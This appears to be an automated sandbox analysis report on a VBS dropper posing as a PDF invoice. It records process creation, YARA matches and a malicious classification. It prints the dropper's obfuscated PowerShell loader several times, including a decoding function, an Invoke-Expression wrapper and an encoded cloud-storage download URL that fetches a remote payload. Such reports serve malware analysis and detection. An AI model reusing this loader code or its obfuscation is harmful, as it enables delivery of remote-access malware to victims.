              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedyJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9AAFBFC24_2_00007FFB9AAFBFC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9AAFCD724_2_00007FFB9AAFCD72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456E6A813_2_0456E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456EF7813_2_0456EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456E36013_2_0456E360
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6080
              Source: unknownProcess created: Commandline size = 6080
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6080Jump to behavior
              Source: amsi64_6648.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_1232.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/11@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fugtservietter.HerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-D3MSVR
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir5mec2p.hzw.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6648
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1232
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsVirustotal: Detection: 26%
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsReversingLabs: Detection: 26%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedyJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
